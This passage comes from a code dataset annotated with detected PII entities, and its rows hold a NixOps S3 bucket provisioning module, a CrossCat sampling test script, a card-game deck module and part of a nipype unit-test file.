'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'test.sv']] |
49 | # -*- coding: utf-8 -*-
# Automatic provisioning of AWS S3 buckets.
import time
import botocore
import boto3
import nixops.util
import nixops.resources
import nixops.ec2_utils
class S3BucketDefinition(nixops.resources.ResourceDefinition):
"""Definition of an S3 bucket."""
@classmethod
def get_type(cls):
return "s3-bucket"
@classmethod
def get_resource_type(cls):
return "s3Buckets"
def __init__(self, xml, config={}):
nixops.resources.ResourceDefinition.__init__(self, xml, config)
        # Attribute lookups assume NixOps' usual "attrs/attr[@name='...']/string"
        # XPath pattern (the dump had anonymized these expressions).
        self.bucket_name = xml.find("attrs/attr[@name='name']/string").get("value")
        self.region = xml.find("attrs/attr[@name='region']/string").get("value")
        self.access_key_id = xml.find("attrs/attr[@name='accessKeyId']/string").get("value")
        self.policy = xml.find("attrs/attr[@name='policy']/string").get("value")
self.website_enabled = self.config["website"]["enabled"]
self.website_suffix = self.config["website"]["suffix"]
self.website_error_document = self.config["website"]["errorDocument"]
def show_type(self):
return "{0} [{1}]".format(self.get_type(), self.region)
class S3BucketState(nixops.resources.ResourceState):
"""State of an S3 bucket."""
state = nixops.util.attr_property("state", nixops.resources.ResourceState.MISSING, int)
bucket_name = nixops.util.attr_property("ec2.bucketName", None)
access_key_id = nixops.util.attr_property("ec2.accessKeyId", None)
region = nixops.util.attr_property("ec2.region", None)
@classmethod
def get_type(cls):
return "s3-bucket"
def __init__(self, depl, name, id):
nixops.resources.ResourceState.__init__(self, depl, name, id)
self._conn = None
def show_type(self):
s = super(S3BucketState, self).show_type()
if self.region: s = "{0} [{1}]".format(s, self.region)
return s
@property
def resource_id(self):
return self.bucket_name
def get_definition_prefix(self):
return "resources.s3Buckets."
def connect(self):
if self._conn: return
(access_key_id, secret_access_key) = nixops.ec2_utils.fetch_aws_secret_key(self.access_key_id)
self._conn = boto3.session.Session(region_name=self.region if self.region != "US" else "us-east-1",
aws_access_key_id=access_key_id,
aws_secret_access_key=secret_access_key)
def create(self, defn, check, allow_reboot, allow_recreate):
self.access_key_id = defn.access_key_id or nixops.ec2_utils.get_access_key_id()
if not self.access_key_id:
raise Exception("please set ‘accessKeyId’, $EC2_ACCESS_KEY or $AWS_ACCESS_KEY_ID")
if len(defn.bucket_name) > 63:
raise Exception("bucket name ‘{0}’ is longer than 63 characters.".format(defn.bucket_name))
self.connect()
s3client = self._conn.client('s3')
if check or self.state != self.UP:
self.log("creating S3 bucket ‘{0}’...".format(defn.bucket_name))
try:
ACL = 'private' # ..or: public-read, public-read-write, authenticated-read
s3loc = region_to_s3_location(defn.region)
if s3loc == "US":
s3client.create_bucket(ACL = ACL,
Bucket = defn.bucket_name)
else:
s3client.create_bucket(ACL = ACL,
Bucket = defn.bucket_name,
CreateBucketConfiguration = {
'LocationConstraint': s3loc
})
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != "BucketAlreadyOwnedByYou": raise
with self.depl._db:
self.state = self.UP
self.bucket_name = defn.bucket_name
self.region = defn.region
if defn.policy:
self.log("setting S3 bucket policy on ‘{0}’...".format(defn.bucket_name))
s3client.put_bucket_policy(Bucket = defn.bucket_name,
Policy = defn.policy.strip())
else:
try:
s3client.delete_bucket_policy(Bucket = defn.bucket_name)
except botocore.exceptions.ClientError as e:
# This seems not to happen - despite docs indicating it should:
# [http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]
if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise # (204 : Bucket didn't have any policy to delete)
if not defn.website_enabled:
try:
s3client.delete_bucket_website(Bucket = defn.bucket_name)
except botocore.exceptions.ClientError as e:
if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise
else:
website_config = { 'IndexDocument': { 'Suffix': defn.website_suffix } }
if defn.website_error_document != "":
website_config['ErrorDocument'] = { 'Key': defn.website_error_document}
s3client.put_bucket_website(Bucket = defn.bucket_name, WebsiteConfiguration = website_config)
def destroy(self, wipe=False):
if self.state == self.UP:
self.connect()
try:
self.log("destroying S3 bucket ‘{0}’...".format(self.bucket_name))
bucket = self._conn.resource('s3').Bucket(self.bucket_name)
try:
bucket.delete()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != "BucketNotEmpty": raise
if not self.depl.logger.confirm("are you sure you want to destroy S3 bucket ‘{0}’?".format(self.bucket_name)): return False
bucket.objects.all().delete()
bucket.delete()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != "NoSuchBucket": raise
return True
def region_to_s3_location(region):
# S3 location names are identical to EC2 regions, except for
# us-east-1 and eu-west-1.
if region == "eu-west-1": return "EU"
elif region == "us-east-1": return "US"
else: return region
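# e.g. region_to_s3_location("eu-west-1") == "EU"; any other region name is
# passed through unchanged as its own S3 LocationConstraint.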
| 6,394 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'S3'], ['LOCATION', 'config='], ['PERSON', 'self.access_key_id = xml.find(dummy@email.com("value'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['LOCATION', 'US'], ['LOCATION', 'defn'], ['LOCATION', 'US'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['LOCATION', 'US'], ['US_DRIVER_LICENSE', 'S3'], ['URL', 'http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]'], ['URL', 'nixops.re'], ['URL', 'nixops.ec'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.resources.Re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ac'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ge'], ['URL', 'self.re'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.util.at'], ['URL', 'ec2.ac'], ['URL', 'nixops.util.at'], ['URL', 'ec2.re'], ['URL', 'nixops.resources.Re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'nixops.ec'], ['URL', 'self.ac'], ['URL', 'boto3.session.Se'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.ac'], ['URL', 'defn.ac'], ['URL', 'nixops.ec'], ['URL', 'utils.ge'], ['URL', 'self.ac'], ['URL', 'self.co'], ['URL', 'conn.cl'], ['URL', 'self.st'], ['URL', 'defn.re'], ['URL', 's3client.cr'], ['URL', 's3client.cr'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.de'], ['URL', 'self.st'], ['URL', 'self.re'], ['URL', 'defn.re'], ['URL', 'defn.policy.st'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'e.re'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'conn.re'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.depl.logger.co'], ['URL', 'bucket.objects.al'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re']] |
50 | #
# Copyright (c) 2010-2014, MIT Probabilistic Computing Project
#
# Lead Developers: Dan Lovell and Jay Baxter
# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka
# Research Leads: Vikash Mansinghka, Patrick Shafto
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import sys
from collections import Counter
#
import numpy
import pylab
pylab.ion()
pylab.show()
#
import crosscat.tests.plot_utils as pu
import crosscat.utils.file_utils as fu
import crosscat.utils.sample_utils as su
import crosscat.utils.api_utils as au
# parse some arguments
parser = argparse.ArgumentParser()
parser.add_argument('pkl_name', type=str)
parser.add_argument('--inf_seed', default=0, type=int)
parser.add_argument('--hostname', default='127.0.0.1', type=str)
args = parser.parse_args()
pkl_name = args.pkl_name
inf_seed = args.inf_seed
hostname = args.hostname
# FIXME: getting weird error on conversion to int: too large from inside pyx
def get_next_seed(max_val=32767): # sys.maxint):
return random_state.randint(max_val)
# resume from saved name
save_dict = fu.unpickle(pkl_name)
random_state = numpy.random.RandomState(inf_seed)
M_c = save_dict['M_c']
X_L = save_dict['X_L']
X_D = save_dict['X_D']
# FIXME: test constraints
# Y = [su.Bunch(index=2,value=2.3), su.Bunch(index=0,value=-4.)]
Y = None
# test simple_predictive_sample_observed
views_replicating_samples_params = su.determine_replicating_samples_params(X_L, X_D)
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
this_view_this_sample = su.simple_predictive_sample(
M_c, X_L, X_D, get_next_seed=get_next_seed, **replicating_sample_params)
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on local' % view_idx)
# test simple_predictive_sample_observed REMOTE
# hostname = 'ec2-23-22-208-4.compute-1.amazonaws.com'
URI = 'http://' + hostname + ':8007'
method_name = 'simple_predictive_sample'
#
views_samples = []
for replicating_samples_params in views_replicating_samples_params:
this_view_samples = []
for replicating_sample_params in replicating_samples_params:
args_dict = dict(
M_c=save_dict['M_c'],
X_L=save_dict['X_L'],
X_D=save_dict['X_D'],
Y=replicating_sample_params['Y'],
Q=replicating_sample_params['Q'],
n=replicating_sample_params['n'],
)
this_view_this_sample, id = au.call(
method_name, args_dict, URI)
print id
this_view_samples.extend(this_view_this_sample)
views_samples.append(this_view_samples)
for view_idx, view_samples in enumerate(views_samples):
data_array = numpy.array(view_samples)
pu.plot_T(data_array)
pylab.title('simple_predictive_sample observed, view %s on remote' % view_idx)
# test simple_predictive_sample_unobserved: reuse the observed queries' columns
# but point them at row index 1e6, far beyond the table, so the row is
# unobserved.
observed_Q = views_replicating_samples_params[0][0]['Q']
Q = [(int(1E6), old_tuple[1]) for old_tuple in observed_Q]
new_row_samples = []
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1000)
new_row_samples.extend(new_row_sample)
new_row_samples = numpy.array(new_row_samples)
pu.plot_T(new_row_samples)
# once more with constraint
Y = [(int(1E6), 0, 100)]
new_row_sample = su.simple_predictive_sample(
M_c, X_L, X_D, Y, Q, get_next_seed, n=1)
# test impute
# imputed_value = su.impute(M_c, X_L, X_D, Y, [Q[3]], 100, get_next_seed)
| 4,283 | [['DATE_TIME', '2010-2014'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Baxter Eaves'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Vikash Mansinghka'], ['PERSON', 'Patrick Shafto'], ['LOCATION', 'crosscat.utils.sample_utils'], ['LOCATION', 'au'], ['PERSON', "default='127.0.0.1"], ['PERSON', 'save_dict = fu.unpickle(pkl_name'], ['LOCATION', 'M_c'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['PERSON', 'new_row_samples'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pylab.io'], ['URL', 'pylab.sh'], ['URL', 'crosscat.tests.pl'], ['URL', 'crosscat.utils.fi'], ['URL', 'crosscat.utils.sa'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'args.pk'], ['URL', 'args.in'], ['URL', 'sys.ma'], ['URL', 'su.de'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'ec2-23-22-208-4.compute-1.amazonaws.com'], ['URL', 'au.ca'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'su.im']] |
51 | # -*- coding: utf-8 -*-
"""
.. module:: deck
:synopsis: Encapsulates the behavior of card collections
.. moduleauthor:: Zach Mitchell dummy@email.com
"""
from random import shuffle
from typing import List
from .cards import (
Card,
CardFaction,
CardEffect,
CardAction,
CardTarget
)
from .cardrepo import CardRepo
from .exceptions import (
RealmsException,
MainDeckEmpty,
PlayerDeckEmpty,
PlayerDeckInitSize,
PlayerDeckInitContents,
UUIDNotFoundError,
HandInitError
)
from collections import Counter
from typing import NamedTuple
CardList = List[Card]
EffectList = List[CardEffect]
FactionList = List[CardFaction]
EffectRecord = NamedTuple('EffectRecord', [
('target', CardTarget),
('action', CardAction),
('value', int),
('uuid', str),
('provider', str)])
class PlayerDeck(object):
"""
Records the state of the player's deck
At any given point in time the player may have three piles of cards: undrawn cards, a
hand of cards, and a pile of used (discarded) cards. PlayerDeck records which cards are
in which pile, provides an interface from which a hand of cards can be assembled, and
shuffles the deck when necessary.
Parameters
----------
player_cards : List[Card]
The list of cards from which the player's starting deck will be constructed
Raises
------
PlayerDeckInitSize
Raised when constructing the deck with the wrong number of cards
PlayerDeckInitContents
Raised when constructing the deck with cards other than Vipers and Scouts
"""
starting_size = 10
def __init__(self, player_cards: CardList):
try:
self._validate_deck_size(player_cards)
self._validate_deck_contents(player_cards)
except RealmsException:
raise
self._undrawn: CardList = player_cards
shuffle(self._undrawn) # shuffled in place
self._discards: CardList = []
@staticmethod
def _validate_deck_size(cards: CardList) -> None:
"""Ensures that the starting deck contains the correct
number of cards
Parameters
----------
cards : CardList
The tentative starting deck
Raises
------
PlayerDeckInitSize
Raised if the tentative starting deck is not the correct size
"""
if len(cards) != PlayerDeck.starting_size:
raise PlayerDeckInitSize(len(cards))
return
@staticmethod
def _validate_deck_contents(cards) -> None:
"""Ensures that the tentative starting deck contains only Vipers and Scouts
Parameters
----------
cards : CardList
The tentative starting deck
Raises
------
PlayerDeckInitContents
Raised if the tentative starting deck contains cards other than Vipers or Scouts
"""
for c in cards:
if (c.name != 'Viper') and (c.name != 'Scout'):
raise PlayerDeckInitContents(c.name)
return
def _next_card(self) -> Card:
"""Produces the next card from the player's deck
Attempts to draw a card from the top of the undrawn pile. If
the undrawn pile is empty, the undrawn pile is replenished from
the discard pile and shuffled before attempting to draw a card again.
An attempt to draw a card from the undrawn pile while both the undrawn
pile and discard pile are empty will raise a ``PlayerDeckEmpty`` exception.
Returns
-------
Card
A card from the top of the undrawn pile
Raises
------
PlayerDeckEmpty
Raised when attempting to draw a card while both undrawn and discard
piles are empty
"""
if len(self._undrawn) > 0:
return self._undrawn.pop()
elif len(self._discards) > 0:
self._refill_undrawn()
return self._undrawn.pop()
else:
raise PlayerDeckEmpty
@property
def cards_remaining(self) -> int:
"""The total number of cards left in the undrawn and discard piles
Returns
-------
int
The number of cards left to draw from
"""
return len(self._undrawn) + len(self._discards)
def _refill_undrawn(self) -> None:
"""Refills the undrawn pile with cards from the discard pile
Note
----
The cards in the discard pile are shuffled before being placed
back into the undrawn pile
"""
self._undrawn: CardList = self._discards
shuffle(self._undrawn) # shuffled in place
self._discards: CardList = []
return
def discard(self, card: Card) -> None:
"""Sends the card to the discard pile
Parameters
----------
card : Card
The card to send to the discard pile
"""
self._discards.append(card)
return
def draw(self, num=5) -> CardList:
"""Draws the specified number of cards from the undrawn pile
Parameters
----------
num : int (Optional)
The number of cards to draw (Default is 5)
Returns
-------
List[Card]
The list of cards that were drawn
Raises
------
IndexError
Raised if no cards are left to draw, or the number of cards requested
is not a positive integer
Note
----
If there are cards remaining in the deck but there are fewer cards than
were requested, then as many cards as possible are returned.
"""
if (num <= 0) or (self.cards_remaining == 0) or (not isinstance(num, int)):
raise IndexError
cards: CardList = []
for _ in range(num):
try:
cards.append(self._next_card())
except PlayerDeckEmpty:
break
return cards
    def _scrap(self, card):
        """
        Permanently removes a card from the discard pile
        """
        # Minimal implementation sketch: a scrapped card leaves the discard
        # pile entirely and is never reshuffled into the undrawn pile.
        if card in self._discards:
            self._discards.remove(card)
        return
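
# Usage sketch for PlayerDeck (hedged; `starting_cards` stands in for the ten
# Viper/Scout cards produced elsewhere, e.g. by a CardRepo):
#
#     deck = PlayerDeck(starting_cards)
#     hand = deck.draw(5)        # draw a hand of five cards
#     for card in hand:
#         deck.discard(card)     # used cards go to the discard pile
#     hand = deck.draw(5)        # drawing reshuffles discards once undrawn is empty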
class MainDeck(object):
"""The deck from which players can acquire cards
Parameters
----------
cardrepo : CardRepo
The repository from which the cards are obtained
"""
def __init__(self, cardrepo: CardRepo):
self._repo: CardRepo = cardrepo
self._cards: CardList = self._repo.main_deck_cards()
shuffle(self._cards)
return
def next_card(self) -> Card:
"""Produces the next card from the main deck
Returns
-------
Card
A card from the top of the main deck
Raises
------
MainDeckEmpty
Raised when attempting to draw a card when the deck is empty
"""
if len(self._cards) > 0:
return self._cards.pop()
else:
raise MainDeckEmpty
class TradeRow(object):
"""Presents the cards that players may acquire
Parameters
----------
maindeck : MainDeck
The deck from which the trade row is drawn
cardrepo : CardRepo
The repository from which cards are obtained
"""
def __init__(self, maindeck: MainDeck, cardrepo: CardRepo):
self._maindeck: MainDeck = maindeck
self._repo: CardRepo = cardrepo
self._explorer = None
self._cards = []
@property
def available(self) -> CardList:
"""Produces the list of all cards available for purchase
Returns
-------
List[Card]
The list of cards available for purchase
"""
return self.cards + [self.explorer]
@property
def cards(self) -> CardList:
"""Produces the list of cards available for purchase
from the main deck
Returns
-------
List[Card]
The list of available cards from the main deck
"""
while len(self._cards) < 5:
try:
card: Card = self._maindeck.next_card()
except MainDeckEmpty:
break
self._cards.append(card)
return self._cards
@property
def explorer(self) -> Card:
"""Produces the current Explorer available for purchase
Returns
-------
Card
The current Explorer
"""
if self._explorer is None:
self._explorer: Card = self._repo.new_explorer()
return self._explorer
def acquire(self, uuid: str) -> Card:
"""Produces the card with the specified UUID
Parameters
----------
uuid : str
The UUID of the card the player wishes to acquire
Returns
-------
Card
The card with the specified UUID
Raises
------
UUIDNotFoundError
Raised when the UUID of the requested card is not found
in the list of available cards
"""
cards_bools = [c.uuid == uuid for c in self.cards]
if True in cards_bools:
i = cards_bools.index(True)
return self._cards.pop(i)
elif self.explorer.uuid == uuid:
card = self._explorer
self._explorer = None
return card
else:
raise UUIDNotFoundError
def scrap(self, uuid: str) -> None:
"""Permanently removes a card from the trade row
Parameters
----------
uuid : str
The UUID of the card to remove
"""
cards_bools = [c.uuid == uuid for c in self.cards]
if True in cards_bools:
i = cards_bools.index(True)
del self._cards[i]
elif self.explorer.uuid == uuid:
self._explorer = None
else:
raise UUIDNotFoundError
return
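
# Usage sketch for TradeRow (hedged; `maindeck` and `repo` stand in for the
# MainDeck and CardRepo instances built during game setup):
#
#     row = TradeRow(maindeck, repo)
#     choices = row.available               # five main-deck cards plus the Explorer
#     bought = row.acquire(choices[0].uuid) # buy by UUID; the slot refills lazily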
class Hand(object):
"""The player's hand of cards
A Hand is made from a list of cards drawn from the undrawn pile of the player's deck,
as well as any bases that were played previously and have not been destroyed.
The processing of cards into a collection of effects is a multi-step process:
1. The basic effects are pulled from each card
2. The factions are tallied up to see which cards may activate their ally abilities
3. Ally abilities are pulled from each card
4. The effects are aggregated by their action types
5. Effects are applied in whatever order the user chooses
    6. If cards are drawn as the result of an action, the effects list is updated
       (a usage sketch of this pipeline appears at the end of the module)
Parameters
----------
to_draw : int
The number of cards to draw initially
existing_bases : List[Card]
Any bases that were played previously and have not yet been destroyed
playerdeck : PlayerDeck
The player's deck
"""
def __init__(self, to_draw: int, existing_bases: CardList, playerdeck: PlayerDeck):
if (to_draw < 0) or (to_draw > 5):
raise HandInitError
try:
drawn: CardList = playerdeck.draw(to_draw)
except IndexError:
drawn: CardList = []
self.cards = drawn + existing_bases
self._playerdeck = playerdeck
return
@staticmethod
def _collect_basic_effects(cards: List[Card]) -> List[EffectRecord]:
"""Assembles a list of `EffectRecord`s from the cards in the hand
"""
basic_effects: List[EffectRecord] = []
for c in cards:
effects: List[CardEffect] = c.effects_basic
records = [EffectRecord(target=e.target,
action=e.action,
value=e.value,
uuid=e.uuid,
provider=c.uuid)
for e in effects]
basic_effects += records
        return basic_effects
@staticmethod
def _collect_ally_factions(cards: List[Card]) -> List[CardFaction]:
"""Assembles a list of factions that should have their ally abilities activated
"""
factions: CardFaction = [c.faction for c in cards]
if CardFaction.ALL in factions:
return [CardFaction.BLOB, CardFaction.STAR, CardFaction.FEDERATION, CardFaction.MACHINE]
counts = Counter(factions)
allies: List[CardFaction] = [key for key in counts.keys()
if counts[key] > 1 and key != CardFaction.UNALIGNED]
return allies
@staticmethod
def _collect_ally_effects(cards: List[Card], facs: List[CardFaction]) -> List[EffectRecord]:
"""Assembles a list of the ally effects that are applicable
"""
ally_effects: List[EffectRecord] = []
for c in cards:
effects: List[CardEffect] = c.effects_ally
records = [EffectRecord(target=e.target,
action=e.action,
value=e.value,
uuid=e.uuid,
provider=c.uuid)
for e in effects if c.faction in facs]
ally_effects += records
return ally_effects
def _collect_effects(self) -> List[EffectRecord]:
"""Assembles a list of effects provided by the player's hand
"""
basic_effects: List[EffectRecord] = Hand._collect_basic_effects(self.cards)
ally_factions: List[CardFaction] = Hand._collect_ally_factions(self.cards)
ally_effects: List[EffectRecord] = Hand._collect_ally_effects(self.cards, ally_factions)
return basic_effects + ally_effects
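
# Minimal sketch of the six-step pipeline described in the Hand docstring
# (hedged; `playerdeck` is a PlayerDeck built from a starting deck as above):
#
#     hand = Hand(to_draw=5, existing_bases=[], playerdeck=playerdeck)
#     for record in hand._collect_effects():
#         print(record.target, record.action, record.value)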
| 13,773 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Zach Mitchell'], ['PERSON', 'EffectRecord'], ['PERSON', 'str'], ['PERSON', 'str'], ['PERSON', 'MainDeck = maindeck'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'PlayerDeck.st'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'self.ca'], ['URL', 'repo.ma'], ['URL', 'self.ca'], ['URL', 'maindeck.ne'], ['URL', 'repo.ne'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'CardFaction.AL'], ['URL', 'CardFaction.ST'], ['URL', 'CardFaction.MA'], ['URL', 'counts.ke'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'self.ca']] |
52 | # -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from __future__ import print_function, unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import open, str, bytes
import os
import tempfile
import shutil
import warnings
import simplejson as json
from nipype.testing import (assert_equal, assert_not_equal, assert_raises,
assert_true, assert_false, with_setup, package_check,
skipif, example_data)
import nipype.interfaces.base as nib
from nipype.utils.filemanip import split_filename
from nipype.interfaces.base import Undefined, config
from traits.testing.nose_tools import skip
import traits.api as traits
def test_bunch():
b = nib.Bunch()
yield assert_equal, b.__dict__, {}
b = nib.Bunch(a=1, b=[2, 3])
yield assert_equal, b.__dict__, {'a': 1, 'b': [2, 3]}
def test_bunch_attribute():
b = nib.Bunch(a=1, b=[2, 3], c=None)
yield assert_equal, b.a, 1
yield assert_equal, b.b, [2, 3]
yield assert_equal, b.c, None
def test_bunch_repr():
b = nib.Bunch(b=2, c=3, a=dict(n=1, m=2))
yield assert_equal, repr(b), "Bunch(a={'m': 2, 'n': 1}, b=2, c=3)"
def test_bunch_methods():
b = nib.Bunch(a=2)
b.update(a=3)
newb = b.dictcopy()
yield assert_equal, b.a, 3
yield assert_equal, b.get('a'), 3
yield assert_equal, b.get('badkey', 'otherthing'), 'otherthing'
yield assert_not_equal, b, newb
yield assert_equal, type(dict()), type(newb)
yield assert_equal, newb['a'], 3
def test_bunch_hash():
# NOTE: Since the path to the json file is included in the Bunch,
# the hash will be unique to each machine.
pth = os.path.split(os.path.abspath(__file__))[0]
json_pth = os.path.join(pth, 'realign_json.json')
b = nib.Bunch(infile=json_pth,
otherthing='blue',
yat=True)
newbdict, bhash = b._get_bunch_hash()
yield assert_equal, bhash, 'PI:KEY'
# Make sure the hash stored in the json file for `infile` is correct.
jshash = nib.md5()
with open(json_pth, 'r') as fp:
jshash.update(fp.read().encode('utf-8'))
yield assert_equal, newbdict['infile'][0][1], jshash.hexdigest()
yield assert_equal, newbdict['yat'], True
# create a temp file
# global tmp_infile, tmp_dir
# tmp_infile = None
# tmp_dir = None
def setup_file():
# global tmp_infile, tmp_dir
tmp_dir = tempfile.mkdtemp()
tmp_infile = os.path.join(tmp_dir, 'foo.txt')
with open(tmp_infile, 'w') as fp:
fp.writelines(['123456789'])
return tmp_infile
def teardown_file(tmp_dir):
shutil.rmtree(tmp_dir)
def test_TraitedSpec():
yield assert_true, nib.TraitedSpec().get_hashval()
yield assert_equal, nib.TraitedSpec().__repr__(), '\n\n'
class spec(nib.TraitedSpec):
foo = nib.traits.Int
goo = nib.traits.Float(usedefault=True)
yield assert_equal, spec().foo, Undefined
yield assert_equal, spec().goo, 0.0
specfunc = lambda x: spec(hoo=x)
yield assert_raises, nib.traits.TraitError, specfunc, 1
infields = spec(foo=1)
hashval = ([('foo', 1), ('goo', '0.0000000000')], 'PI:KEY')
yield assert_equal, infields.get_hashval(), hashval
# yield assert_equal, infields.hashval[1], hashval[1]
yield assert_equal, infields.__repr__(), '\nfoo = 1\ngoo = 0.0\n'
@skip
def test_TraitedSpec_dynamic():
from pickle import dumps, loads
a = nib.BaseTraitedSpec()
a.add_trait('foo', nib.traits.Int)
a.foo = 1
assign_a = lambda: setattr(a, 'foo', 'a')
yield assert_raises, Exception, assign_a
pkld_a = dumps(a)
unpkld_a = loads(pkld_a)
assign_a_again = lambda: setattr(unpkld_a, 'foo', 'a')
yield assert_raises, Exception, assign_a_again
def test_TraitedSpec_logic():
class spec3(nib.TraitedSpec):
_xor_inputs = ('foo', 'bar')
foo = nib.traits.Int(xor=_xor_inputs,
desc='foo or bar, not both')
bar = nib.traits.Int(xor=_xor_inputs,
desc='bar or foo, not both')
kung = nib.traits.Float(requires=('foo',),
position=0,
desc='kung foo')
class out3(nib.TraitedSpec):
output = nib.traits.Int
class MyInterface(nib.BaseInterface):
input_spec = spec3
output_spec = out3
myif = MyInterface()
yield assert_raises, TypeError, setattr(myif.inputs, 'kung', 10.0)
myif.inputs.foo = 1
yield assert_equal, myif.inputs.foo, 1
set_bar = lambda: setattr(myif.inputs, 'bar', 1)
yield assert_raises, IOError, set_bar
yield assert_equal, myif.inputs.foo, 1
myif.inputs.kung = 2
yield assert_equal, myif.inputs.kung, 2.0
def test_deprecation():
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec1(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='0.1')
spec_instance = DeprecationSpec1()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec1numeric(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='0.1')
spec_instance = DeprecationSpec1numeric()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec2(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='100', new_name='bar')
spec_instance = DeprecationSpec2()
set_foo = lambda: setattr(spec_instance, 'foo', 1)
yield assert_raises, nib.TraitError, set_foo
yield assert_equal, len(w), 0, 'no warnings, just errors'
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec3(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='1000', new_name='bar')
bar = nib.traits.Int()
spec_instance = DeprecationSpec3()
not_raised = True
try:
spec_instance.foo = 1
except nib.TraitError:
not_raised = False
yield assert_true, not_raised
yield assert_equal, len(w), 1, 'deprecated warning 1 %s' % [w1.message for w1 in w]
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', UserWarning)
class DeprecationSpec3(nib.TraitedSpec):
foo = nib.traits.Int(deprecated='1000', new_name='bar')
bar = nib.traits.Int()
spec_instance = DeprecationSpec3()
not_raised = True
try:
spec_instance.foo = 1
except nib.TraitError:
not_raised = False
yield assert_true, not_raised
yield assert_equal, spec_instance.foo, Undefined
yield assert_equal, spec_instance.bar, 1
yield assert_equal, len(w), 1, 'deprecated warning 2 %s' % [w1.message for w1 in w]
def test_namesource():
tmp_infile = setup_file()
